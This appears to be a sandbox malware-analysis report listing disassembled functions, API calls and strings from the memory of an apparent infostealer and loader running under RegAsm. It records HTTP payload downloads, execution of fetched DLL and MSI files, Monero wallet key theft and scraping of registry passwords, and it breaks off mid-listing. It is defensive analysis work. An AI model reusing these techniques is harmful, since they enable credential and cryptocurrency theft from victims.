Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: d6f2d6b1cef7fab6a877228a83399a222af4b6dabdae855cd259993beb0448bd
Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
Opcode Fuzzy Hash: d6f2d6b1cef7fab6a877228a83399a222af4b6dabdae855cd259993beb0448bd
Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A

Function 00406280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
StrCmpCA.SHLWAPI(?,013439D8), ref: 00406303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
HttpOpenRequestA.WININET(00000000,GET,?,01343140,00000000,00000000,00400100,00000000), ref: 00406385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
InternetCloseHandle.WININET(00000000), ref: 004064EF
InternetCloseHandle.WININET(00000000), ref: 004064F9
InternetCloseHandle.WININET(00000000), ref: 00406503

Strings

GET, xrefs: 0040637C
ERROR, xrefs: 00406407
ERROR, xrefs: 004064C9

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3074848878-2509457195
Opcode ID: b0c7de0145d63b70ce53b1e8b83d9b49617bc25b5baf4ddabad6d870445ee4ad
Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
Opcode Fuzzy Hash: b0c7de0145d63b70ce53b1e8b83d9b49617bc25b5baf4ddabad6d870445ee4ad
Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

Function 00415510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0133AAB8,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
Sleep.KERNEL32(0000EA60), ref: 00415A1B

Strings

ERROR, xrefs: 00415636
ERROR, xrefs: 0041577D
ERROR, xrefs: 00415849
ERROR, xrefs: 004159FE
ERROR, xrefs: 00415693
ERROR, xrefs: 00415932

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: 8d487e1654f754ba5a0761ee3c5de5ee89a113c5c6ab67c4e72828168a8328fb
Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
Opcode Fuzzy Hash: 8d487e1654f754ba5a0761ee3c5de5ee89a113c5c6ab67c4e72828168a8328fb
Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

Function 00412E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
ShellExecuteEx.SHELL32(0000003C), ref: 004134EA

Strings

C:\Windows\system32\msiexec.exe, xrefs: 004134BF
/passive, xrefs: 0041345B
C:\Windows\system32\rundll32.exe, xrefs: 00413332
.dll, xrefs: 004131E5
.msi, xrefs: 00413398
<, xrefs: 00413490
"" , xrefs: 0041309A
/i ", xrefs: 004133E4

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 7ca998b6b529aeb001394848e85b67d7579dbc99494248e03994ec2c30538700
Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
Opcode Fuzzy Hash: 7ca998b6b529aeb001394848e85b67d7579dbc99494248e03994ec2c30538700
Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A

Function 00418320 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

RegOpenKeyExA.KERNEL32(00000000,01336400,00000000,00020019,00000000,004205B6), ref: 004183A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
wsprintfA.USER32 ref: 00418459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041847B

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Strings

%s\%s, xrefs: 0041844D
?, xrefs: 0041837A
- , xrefs: 004185A3

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Openlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 2731306069-3278919252
Opcode ID: dd6617512d8e06e62f9c4619fa979c9d7048b8557595c82cd813ea9da7bb7c9e
Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
Opcode Fuzzy Hash: dd6617512d8e06e62f9c4619fa979c9d7048b8557595c82cd813ea9da7bb7c9e
Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5

Function 004060A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
StrCmpCA.SHLWAPI(?,013439D8), ref: 00406147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
InternetCloseHandle.WININET(a+A), ref: 00406253
InternetCloseHandle.WININET(00000000), ref: 00406260

Strings

a+A, xrefs: 004060B0, 0040617F, 00406266, 00406124, 004060B3
a+A, xrefs: 0040624F, 004061D8, 004061DB, 00406252

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: a+A$a+A
API String ID: 4287319946-2847607090
Opcode ID: 8e412136ec4a27f907b8c44360a338e6cf7b286a2ded7d5447bec277780c7ebd
Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
Opcode Fuzzy Hash: 8e412136ec4a27f907b8c44360a338e6cf7b286a2ded7d5447bec277780c7ebd
Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A

Function 00401310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 139stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401327

Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
Part of subcall function 004012A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5

lstrcatA.KERNEL32(?,00000000), ref: 0040134F
lstrlenA.KERNEL32(?), ref: 0040135C
lstrcatA.KERNEL32(?,.keys), ref: 00401377

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,01341B00,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A

memset.MSVCRT ref: 00401516

Strings

.keys, xrefs: 0040136B
SOFTWARE\monero-project\monero-core, xrefs: 00401335
wallet_path, xrefs: 00401330
\Monero\wallet.keys, xrefs: 0040138D

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$File$AllocHeapLocallstrlenmemset$CloseCreateFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 575717205-218353709
Opcode ID: 39317e8262a0c6bf4b356c8e33d2227605c61f9266290840a9bd15d469870bc1
Instruction ID: 2d64d6a561879fca44fb71c04a0a84c7ebf7a9ed2d970630d286a4d87e6dc5bb
Opcode Fuzzy Hash: 39317e8262a0c6bf4b356c8e33d2227605c61f9266290840a9bd15d469870bc1
Instruction Fuzzy Hash: 955165B1D5011897CB15FB61DD91FED733CAF54304F4041ADB60A62092EE385BDACBAA

Function 004170D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
memset.MSVCRT ref: 0041716A
??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
sA, xrefs: 004172AE, 00417179, 0041717C
sA, xrefs: 00417111

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-2614523144
Opcode ID: a73ac6e1bb2c91b578430d02177e5a2f8beb51943881740cc90b8311f986bdaf
Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
Opcode Fuzzy Hash: a73ac6e1bb2c91b578430d02177e5a2f8beb51943881740cc90b8311f986bdaf
Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D

Function 004075D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
Part of subcall function 004072D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459

lstrcatA.KERNEL32(33A67020,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
